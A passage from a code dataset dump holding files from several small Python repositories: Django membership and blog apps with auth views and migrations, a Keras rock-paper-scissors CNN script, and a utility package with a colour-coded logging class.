"text": "from django.shortcuts import render, redirect\nfrom django.views import generic\nfrom django.http import HttpResponse\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import render, redirect\n\n\nfrom .models import Miembro\nfrom django.contrib.auth.models import User\n#from .forms import *\n\n\n########################################################################################################################\n\nclass MiembroView(generic.ListView):\n model = Miembro\n template_name = 'miembro/miembro_listar.html'\n context_object_name = 'obj'\n\n\n\n\ndef miembro_inactivar(request, id):\n miembro = Miembro.objects.filter(pk=id).first()\n usuario = User.objects.filter(pk=miembro.usuario.id).first()\n contexto={}\n template_name=\"miembro/miembro_del.html\"\n\n\n if not miembro:\n return redirect(\"miembro:miembro_listar\")\n \n if request.method=='GET':\n contexto={'obj':miembro}\n \n if request.method=='POST':\n miembro.activo=False\n miembro.save()\n usuario.is_active=False\n usuario.save()\n return redirect(\"miembro:miembro_listar\")\n\n return render(request,template_name,contexto)"
},
{
"alpha_fraction": 0.45917603373527527,
"alphanum_fraction": 0.4823969900608063,
"avg_line_length": 24.188678741455078,
"blob_id": "2bd0e513ee4185077e7331df6ead36b40934bbc8",
"content_id": "cc30c91c96917dd5968e86da0b7984ca44c7e9c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1335,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 53,
"path": "/miembro/migrations/0003_auto_20200525_1753.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.6 on 2020-05-25 22:53\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('miembro', '0002_auto_20200525_1611'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='barrio',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='ciudad',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='eps',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='genero',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='miembro',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='rol_miembro',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='sede',\n old_name='estado',\n new_name='activo',\n ),\n migrations.RenameField(\n model_name='tipo_sangre',\n old_name='estado',\n new_name='activo',\n ),\n ]\n"
},
{
"alpha_fraction": 0.7942386865615845,
"alphanum_fraction": 0.7942386865615845,
"avg_line_length": 39.5,
"blob_id": "6ba2fa4be97b743cc5ab0d803a1b77d6f870c798",
"content_id": "75d7829c3c27d828fad8ece564d780c0cdc2a6bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 246,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 6,
"path": "/bases/admin.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nadmin.site.site_header = \"Panel de administración IEEE-ETITC\"\nadmin.site.site_title = \"Portal de administración\"\nadmin.site.index_title = \"Bienvenidos al portal de administración\"\n"
},
{
"alpha_fraction": 0.5419847369194031,
"alphanum_fraction": 0.5601878762245178,
"avg_line_length": 31.132076263427734,
"blob_id": "9f75c4d8b6488c06300a52d11ff3246c6974dc8e",
"content_id": "1e27dc397a4715688103e55adb2edad1af8cb714",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1711,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 53,
"path": "/miembro/migrations/0004_auto_20200526_0132.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.6 on 2020-05-26 06:32\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('miembro', '0003_auto_20200525_1753'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='barrio',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='ciudad',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='eps',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='genero',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='miembro',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='rol_miembro',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='sede',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n migrations.AlterField(\n model_name='tipo_sangre',\n name='activo',\n field=models.BooleanField(default=True, verbose_name='Está activo'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.576184868812561,
"alphanum_fraction": 0.5851938724517822,
"avg_line_length": 48.096153259277344,
"blob_id": "7a781ef8dae2b401f93bbb384fb3ac2a6551973b",
"content_id": "4c0fe118a2682f46f0afee31f863508f51f08e70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2559,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 52,
"path": "/actividad_interna/migrations/0001_initial.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.6 on 2020-05-26 06:24\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Tipo_actividad',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('activo', models.BooleanField(default=True, verbose_name='Está activo')),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción del tipo de actividad', max_length=45, unique=True, verbose_name='Descripción tipo actividad')),\n ],\n options={\n 'verbose_name': 'Tipo de actividad',\n 'verbose_name_plural': 'Tipos de actividades',\n },\n ),\n migrations.CreateModel(\n name='Actividad_interna',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('activo', models.BooleanField(default=True, verbose_name='Está activo')),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('nombre', models.CharField(help_text='Nombre de la actividad', max_length=255, verbose_name='Nombre actividad')),\n ('descripcion', models.TextField(help_text='Descripción de la actividad', verbose_name='Descripción de la actividad')),\n ('fecha_actividad', models.DateTimeField()),\n ('lugar_actividad', models.TextField(max_length=255)),\n ('solo_miembros', models.BooleanField(default=False)),\n ('tipo_actividad', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='actividad_interna.Tipo_actividad')),\n ],\n options={\n 'verbose_name': 'Actividad interna',\n 'verbose_name_plural': 'Actividades internas',\n },\n ),\n ]\n"
}
] | 17 |
ak-S24/stone-paper-scissors-
|
https://github.com/ak-S24/stone-paper-scissors-
|
265cf73de0e5dd1a9b577d6cb40883d23b49496a
|
16660b70009e94be1febeb1f3c7795adcf219d59
|
e0a02143dd7eba04922c8b113283fb465bf2080a
|
refs/heads/master
| 2022-10-21T20:39:25.409087 | 2020-06-15T11:13:23 | 2020-06-15T11:13:23 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6593712568283081,
"alphanum_fraction": 0.6995622515678406,
"avg_line_length": 24.793813705444336,
"blob_id": "83a3e1d1cf17d3618d4e595d4941c9ca97e45654",
"content_id": "62ea8e545dda698ae2fcc74526f1921ae48b4498",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2513,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 97,
"path": "/st_pa_sc.py",
"repo_name": "ak-S24/stone-paper-scissors-",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 9 11:07:58 2020\n\n@author: akku\n\"\"\"\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Flatten\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\n\n#initializing the classifier object\nclassifier= Sequential()\n\n#creating convolutional layer\nclassifier.add(Conv2D(32, kernel_size=(3, 3), input_shape=(64, 64, 3), activation='relu'))\n\n#pooling the convolved layer\nclassifier.add(MaxPooling2D(pool_size=(2,2)))\n\n#adding second convolution layer\nclassifier.add(Conv2D(32, kernel_size=(3, 3), activation='relu'))\n\n#pooling\nclassifier.add(MaxPooling2D(pool_size=(2,2)))\n\n#flattening the layers\nclassifier.add(Flatten())\n\n#making a full connection\nclassifier.add(Dense(units=128, activation='relu'))\nclassifier.add(Dropout(0.2))\nclassifier.add(Dense(units=128, activation ='relu'))\nclassifier.add(Dropout(0.2))\nclassifier.add(Dense(units=3, activation='softmax'))\n\n#compiling \nclassifier.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\nfrom keras.preprocessing.image import ImageDataGenerator\n\n#fitting the cnn to the images\ntrain_data= ImageDataGenerator(\n rescale=1./255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\ntest_data = ImageDataGenerator(rescale=1./255)\ntrain_generator = train_data.flow_from_directory(\n 'train_set',\n target_size=(64, 64),\n batch_size=32,\n class_mode='categorical')\ntest_generator = test_data.flow_from_directory(\n 'test_set',\n target_size=(64, 64),\n batch_size=32,\n class_mode='categorical')\n\ntrain_generator.class_indices\n\n\n#train the model\nclassifier.fit(\n train_generator,\n steps_per_epoch=2520,\n epochs=5,\n validation_data=test_generator,\n validation_steps=372)\n\n\n\n#loading the saved model\nfrom keras.models import load_model\nmodel=load_model('model2.h5')\nmodel.summary()\n\n\n\n#making a single prediction\nimport numpy as np\nfrom keras.preprocessing import image\n\nsingle_image=image.load_img('single_pred/test2.jpg', target_size=(64, 64))\nsingle_image=image.img_to_array(single_image)\nsingle_image=np.expand_dims(single_image, axis=0)\npred=model.predict(single_image)\n\nx, y,z=round(pred[0][0]),round( pred[0][1]),round(pred[0][2])\nif((x, y, z)==(1, 0, 0)):\n print('paper')\nelif((x, y, z)==(0, 1, 0)):\n print('rock')\nelif((x, y, z)==(0, 0, 1)):\n print('scissors')\n \n\n \n"
}
] | 1 |
akshaymishra5395/try_django
|
https://github.com/akshaymishra5395/try_django
|
bfe10de176a9f91f3974da25109f6dd88c8eed5a
|
8902ae961cd04ef699a4767e7df77db8189b43f3
|
bd1f96c707b8a2cf4c4dae75d685d23849ec057f
|
refs/heads/master
| 2020-05-17T14:28:54.773383 | 2019-04-30T19:01:30 | 2019-04-30T19:01:30 | 183,765,462 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7333939671516418,
"alphanum_fraction": 0.7379435896873474,
"avg_line_length": 22.869565963745117,
"blob_id": "508368c3c0105133fc16f67546b1d615335e2712",
"content_id": "cee54d65cea388d966d22d61f68bacdb91eea5d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1099,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 46,
"path": "/try_django/views.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.template.loader import get_template\nfrom django.contrib.auth.decorators import login_required\n\nfrom .forms import ContactForm\n\n@login_required\ndef home_page(request):\n\tcontext={\"title\":'home'}\n\tif request.user.is_authenticated:\n\t\tcontext={\"title\":'home',\"list\":[1,2,3,4,5]}\n\treturn render(request,\"home.html\",context);\n\ndef about_page(request):\n\tcontext={\"title\":'about'}\n\treturn render(request,\"about.html\",context);\n\n\ndef contact_page(request):\n\tform=ContactForm(request.POST or None)\n\tif form.is_valid():\n\t\tprint(form.cleaned_data)\n\t\tform=ContactForm()\n\telse:\n\t\tprint('hii')\n\n\ttemplate_name='contact.html'\n\tcontext={\n\t\t\t\"title\":'contact',\n\t\t\t\"form\" : form\n\t\t\t}\n\treturn render(request,template_name,context);\n\n\n\ndef courses_page(request):\n\tcontext={\"title\":'home'}\n\treturn render(request,\"home.html\",context);\n\ndef example_page(request):\n\tcontext={\"title\":'Example'}\n\ttemplate_name='home.html'\n\ttemplate_obj=get_template(template_name)\n\trender_obj=template_obj.render(context)\n\treturn HttpResponse(render_obj);\n\n"
},
{
"alpha_fraction": 0.6818820238113403,
"alphanum_fraction": 0.6875,
"avg_line_length": 33.73170852661133,
"blob_id": "b592ac49f112d01334890f4cb4bc178b4c1fb166",
"content_id": "761b85db5a6e55b71234f0595b5bc446e1157918",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1424,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 41,
"path": "/try_django/urls.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "\"\"\"try_django URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path,re_path,include #url\n\nfrom .views import home_page,about_page,contact_page,courses_page,example_page\nfrom blog.views import blog_post_create_view\nfrom accounts.views import login_view,register_view,logout_view\n\nurlpatterns = [\n path('accounts/register/',register_view),\n path('accounts/login/',login_view),\n path('accounts/logout/',logout_view),\n\t\n path('', home_page),\n\tpath('home/', home_page),\n \n \n \n path('blog/', include('blog.urls')),\n path('blog-new/', blog_post_create_view),\n #re_path(r'^about/$', about_page),\n\tre_path(r'^about/$', about_page),\n\tpath('contact/', contact_page),\n\tpath('courses/', courses_page),\n path('example/', example_page),\n path('cfe-admin/', admin.site.urls)\n]\n"
},
{
"alpha_fraction": 0.517241358757019,
"alphanum_fraction": 0.517241358757019,
"avg_line_length": 15,
"blob_id": "96e31063e9ebf260d94b2db604077b8742caf777",
"content_id": "b0eb1ba972d220c9a0d68589a32cda392df3aa6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 145,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 9,
"path": "/blog/templates/blog/list.html",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "{% extends 'base.html'%}\n\n{%block content%}\n\t<table>\n\t\t{%for a in obj%}\n\t\t<tr><td>{{a.title}}</td></tr></p>\n\t\t{%endfor%}\n\t</table>\n{%endblock%}\n "
},
{
"alpha_fraction": 0.6388676166534424,
"alphanum_fraction": 0.6388676166534424,
"avg_line_length": 30.14285659790039,
"blob_id": "447ec4d5cda79a97b7a69fd52e7e16d3f494b8fe",
"content_id": "358f3762a36ad525e009bd72707db588cdd75384",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1307,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 42,
"path": "/accounts/views.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render,redirect\nfrom django.contrib.auth import authenticate,get_user_model,login,logout\n\nfrom .forms import UserLoginForm ,RegisterForm\n\ndef login_view(request):\n next=request.GET.get('next')\n form = UserLoginForm(request.POST or None)\n if form.is_valid():\n username=form.cleaned_data.get('username')\n password=form.cleaned_data.get('password')\n user=authenticate(username=username ,password=password)\n login(request , user)\n if next:\n return redirect(next)\n return redirect('/')\n context={\n 'form':form\n }\n return render(request,'login.html',context)\n\ndef register_view(request):\n next=request.GET.get('next')\n form = RegisterForm(request.POST or None)\n if form.is_valid():\n user=form.save(commit=False)\n password=form.cleaned_data.get('password')\n user.set_password(password)\n user.save()\n new_user=authenticate(username=user.username ,password=password)\n login(request , new_user)\n if next:\n return redirect(next)\n return redirect('/')\n context={\n 'form':form\n }\n return render(request,'signup.html',context)\n\ndef logout_view(request):\n logout(request)\n return redirect('/')"
},
{
"alpha_fraction": 0.7474257946014404,
"alphanum_fraction": 0.7577226161956787,
"avg_line_length": 26.53333282470703,
"blob_id": "a860e6ef2adf767f1cd1466c714c42dcda9244cb",
"content_id": "335b888973d641d6344b754564c60c0a471b5dde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1651,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 60,
"path": "/blog/views.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django.http import Http404\nfrom django.shortcuts import render,get_object_or_404\n\n# Create your views here.\nfrom .models import BlogPost\nfrom .forms import BlogPostModelForm\n\ndef blog_post_detail_page(request,slug):\n\tobj=get_object_or_404(BlogPost,slug=slug)\n\t#qs=BlogPost.objects.filter(slug=slug)\n\t#if qs.count()==0:\n\t#\traise Http404\n\t#obj=qs.first()\n\ttemplate_name=\"blog/detail.html\"\n\tcontext={'obj':obj}\n\treturn render(request,template_name,context)\n\n\n\n\ndef blog_post_list_view(request):\n\tobj=BlogPost.objects.all()\n\ttemplate_name=\"blog/list.html\"\n\tcontext={'obj':obj}\n\treturn render(request,template_name,context)\n\n\ndef blog_post_create_view(request):\n\tform=BlogPostModelForm(request.POST or None)\n\tif form.is_valid():\n\t\t#obj=BlogPost.objects.create(**form.cleaned_data)\n\t\tobj=form.save(commit=False)\n\t\t#obj.title=form.cleaned_data['title']+'0'\n\t\tobj.save()\n\t\tform=BlogPostModelForm()\n\ttemplate_name=\"blog/create.html\"\n\tcontext={'form':form}\n\treturn render(request,template_name,context)\n\ndef blog_post_detail_view(request,slug):\n\tobj=BlogPost.objects.filter(slug=slug)\n\ttemplate_name=\"blog/detail.html\"\n\tcontext={'obj':obj.first()}\n\treturn render(request,template_name,context)\n\ndef blog_post_retreive_view(request):\n\ttemplate_name=\"blog/retrieve.html\"\n\tcontext={}\n\treturn render(request,template_name,context)\n\ndef blog_post_update_view(request,slug):\n\tobj=get_object_or_404(BlogPost,slug=slug)\n\ttemplate_name=\"blog/update.html\"\n\tcontext={'object':obj,'form':None}\n\treturn render(request,template_name,context)\n\ndef blog_post_delete_view(request):\n\ttemplate_name=\"blog/delete.html\"\n\tcontext={}\n\treturn render(request,template_name,context)"
},
{
"alpha_fraction": 0.7581573724746704,
"alphanum_fraction": 0.7581573724746704,
"avg_line_length": 27.94444465637207,
"blob_id": "109ebebf4740504dc54133468bfe68445824d17f",
"content_id": "111f23f79e709bdc4f31fcf35818049544a50769",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 521,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 18,
"path": "/blog/forms.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom .models import BlogPost \nclass BlogPostForm(forms.Form):\n\ttitle=forms.CharField()\n\tslug=forms.SlugField()\n\tcontent=forms.CharField(widget=forms.Textarea)\n\nclass BlogPostModelForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel=BlogPost\n\t\tfields=['title','slug','content']\n\n\tdef clean_title(self,*args,**kwargs):\n\t\ttitle=self.cleaned_data.get('title')\n\t\tqs=BlogPost.objects.filter(title__iexact=title)\n\t\tif qs.exists():\n\t\t\traise forms.ValidationError('title exists.Please add another')\n\t\treturn email\n"
},
{
"alpha_fraction": 0.6601731777191162,
"alphanum_fraction": 0.6601731777191162,
"avg_line_length": 34.53845977783203,
"blob_id": "b9c7c423c7d7c6343fd4dbb6fd3ef5be6dc157bc",
"content_id": "591ce576a00e20060bd9964aadf48ef2925cb38d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 13,
"path": "/blog/urls.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django.urls import path,re_path #url\n\nfrom .views import (blog_post_list_view,blog_post_detail_view,blog_post_delete_view,\nblog_post_retreive_view,\nblog_post_update_view)\n\nurlpatterns = [\n \tpath('', blog_post_list_view),\n path('<str:slug>', blog_post_detail_view),\n path('<str:slug>/retreive', blog_post_retreive_view),\n path('<str:slug>/delete', blog_post_delete_view),\n path('<str:slug>/edit', blog_post_update_view),\n ]\n"
},
{
"alpha_fraction": 0.6675915718078613,
"alphanum_fraction": 0.6698113083839417,
"avg_line_length": 39.931819915771484,
"blob_id": "e9506257fa051852192ff8c72232cd631345383a",
"content_id": "3a103838aa05e106ac0238437c2e78503c50a153",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1802,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 44,
"path": "/accounts/forms.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom django.contrib.auth import authenticate,get_user_model\nUser=get_user_model()\nclass UserLoginForm(forms.Form):\n username=forms.CharField()\n password=forms.CharField(widget=forms.PasswordInput)\n\n def clean(self,*args,**kwargs):\n username=self.cleaned_data.get('username')\n password=self.cleaned_data.get('password')\n\n if username and password:\n user=authenticate(username=username , password=password)\n if not user:\n raise forms.ValidationError('This user does not exist')\n if not user.check_password(password):\n raise forms.ValidationError('Incorrect Password')\n if not user.is_active:\n raise forms.ValidationError('This user is not active')\n return super(UserLoginForm,self).clean(*args,**kwargs)\n\nclass RegisterForm(forms.ModelForm):\n firstName=forms.CharField(label='firstname')\n lastname =forms.CharField(label='lastname')\n email =forms.EmailField(label='email')\n password =forms.CharField(widget=forms.PasswordInput,label='password')\n password2 =forms.CharField(widget=forms.PasswordInput,label='confirmPassword')\n class Meta:\n model = User\n fields=['username','firstName','lastname','email','password']\n\n def clean_email(self):\n email=self.cleaned_data.get('email')\n email_qs=User.objects.filter(email=email)\n if email_qs.exists():\n raise form.ValidationError('This email is already being used')\n return email\n \n def clean_password(self):\n password=self.cleaned_data.get('password')\n password2=self.cleaned_data.get('password2')\n if password!=password2:\n raise forms.ValidationError('Password must match')\n return password\n\n"
},
{
"alpha_fraction": 0.7783018946647644,
"alphanum_fraction": 0.7924528121948242,
"avg_line_length": 29.14285659790039,
"blob_id": "984170419392c6b1182a8dc13e913a08ab181bed",
"content_id": "db0c6c3bc61672f203668b913c44ba6b26577b6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 7,
"path": "/blog/models.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n# Create your models here.\nclass BlogPost(models.Model):\n\ttitle=models.CharField(max_length=120)\n\tslug=models.SlugField(unique=True)\n\tcontent=models.TextField(null=True,blank=True)\n\n"
}
] | 9 |
dyldgithub/PythonStudy
|
https://github.com/dyldgithub/PythonStudy
|
fe95437f5e437c02d8881e69bac4e9e7bb31679f
|
e68128c77f811893c658fd4f0d1e40f5cea90a70
|
96f3fd89adf2829c8486e12b664d9edb3a5e6307
|
refs/heads/master
| 2020-03-21T07:19:21.327071 | 2019-05-30T06:15:49 | 2019-05-30T06:15:49 | 138,273,797 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6913043260574341,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 27.875,
"blob_id": "28812cd9749970515b351b20324138fd9fa68a8f",
"content_id": "3418e694914b94beeb4d6f103e92e03bdc874e65",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 230,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 8,
"path": "/Tools/src/base/common/message.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\nREJECT_INIT=\"Reject init!\"\nINVALID_LOG_LEVEL=\"Invalid log level!\"\nERROR_MODE=\"Mode error! please use \\'help\\' to get help message.\"\nERROR_PARAMETER=\"Parameter error!\""
},
{
"alpha_fraction": 0.4780219793319702,
"alphanum_fraction": 0.4890109896659851,
"avg_line_length": 15.636363983154297,
"blob_id": "412ff7176814ee0399d35342e1c1a0367e7591c9",
"content_id": "775c2ad0769bb2f7f69a34516a635c2430bde1c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 182,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 11,
"path": "/Tools/src/base/common/project.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\nclass Project:\n Name=\"\"\n Arcs=[]\n Pms=[]\n\n def __init__(self,name=\"\",branch=\"\",arc=\"\",pm=\"\"):\n pass"
},
{
"alpha_fraction": 0.4848484992980957,
"alphanum_fraction": 0.4848484992980957,
"avg_line_length": 12.399999618530273,
"blob_id": "44a611fb3f70ea9bfcc791dfcfff09dfcb7bf66d",
"content_id": "924fda6a3a39c490db2ffe6e7636a9a84cdcd5cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 66,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 5,
"path": "/Tools/src/base/tools/__init__.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "__all__=[\n \"common_tools\",\n \"git_branch_helper\",\n \"log\"\n]"
},
{
"alpha_fraction": 0.5581061840057373,
"alphanum_fraction": 0.5609756112098694,
"avg_line_length": 17.864864349365234,
"blob_id": "52cc2c79e7ad9f7a7f0d7c906f0a5a780883039c",
"content_id": "8e40eec96cc866da620dd306a3b29f78b9a94e58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 705,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 37,
"path": "/Tools/src/base/common/file.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\nclass File:\n attri={}\n\n def __init__(self,name,version=\"\",filetype=\"\",**attri):\n self.__name=name\n self.__version=version\n self.__type=filetype\n # 其他属性\n def add_attri(self,):\n pass\n def set_name(self,name):\n self.__name = name\n def get_version(self,version):\n self.__version = version\n def set_version(self):\n return self.__version\n\n def __str__(self):\n return str(self.__name)+\"-\"+str(self.__version)\n\n\nclass Attri:\n pass\n # def __init__(self):\n\n\n\nclass ApkBanary(File):\n pass\nclass SoBanary(File):\n pass\nclass XmlBanary(File):\n pass"
},
{
"alpha_fraction": 0.4832724928855896,
"alphanum_fraction": 0.5085158348083496,
"avg_line_length": 27.08547019958496,
"blob_id": "501a042cdb39bcd9723616b6f8f2f197ccbb11b8",
"content_id": "774fafec7d702297cf9499adfc3cc04104814f9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3288,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 117,
"path": "/Tools/src/base/tools/log.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\nimport time\nfrom base.common.message import *\n\n\nclass Log:\n PARENT_TAG = \"\"\n class __LogLevel:\n color = \"\"\n\n def __init__(self, description, priority, color=\"\\033[0;38m%s\\033[0m\"):\n self.__description = description\n self.__priority = priority\n self.color = color\n\n def __str__(self):\n return str(self.__description[0])\n\n def __gt__(self, other):\n return self.__priority > other.__priority\n\n def __ge__(self, other):\n return self.__priority >= other.__priority\n\n def __eq__(self, other):\n return self.__priority == other.__priority\n\n def __ne__(self, other):\n return self.__priority != other.__priority\n\n def __lt__(self, other):\n return self.__priority < other.__priority\n\n def __le__(self, other):\n return self.__priority <= other.__priority\n\n def __cmp__(self, other):\n if self.__priority < other.__priority:\n return -1\n elif self.__priority > other.__priority:\n return 1\n else:\n return 0\n\n Assert = __LogLevel(\"Assert\", 6, \"\\033[1;35m%s\\033[0m\")\n Error = __LogLevel(\"Error\", 5, \"\\033[1;31m%s\\033[0m\")\n Warning = __LogLevel(\"Warning\", 4, \"\\033[1;33m%s\\033[0m\")\n Info = __LogLevel(\"Info\", 3, \"\\033[1;32m%s\\033[0m\")\n Debug = __LogLevel(\"Debug\", 2, \"\\033[1;34m%s\\033[0m\")\n Verbose = __LogLevel(\"Verbose\", 1, \"\\033[1;37m%s\\033[0m\")\n DEFAULT_LOG_LEVEL = Debug\n Log_Enable = True\n\n def __init__(self, parent_tag):\n raise TypeError(REJECT_INIT)\n\n @staticmethod\n def set_parent_tag(parent_tag):\n Log.PARENT_TAG = parent_tag\n\n @staticmethod\n def a(tag=\"\", *logs):\n Log.log(tag, Log.Assert, *logs)\n\n @staticmethod\n def e(tag=\"\", *logs):\n Log.log(tag, Log.Error, *logs)\n\n @staticmethod\n def w(tag=\"\", *logs):\n Log.log(tag, Log.Warning, *logs)\n\n @staticmethod\n def i(tag=\"\", *logs):\n 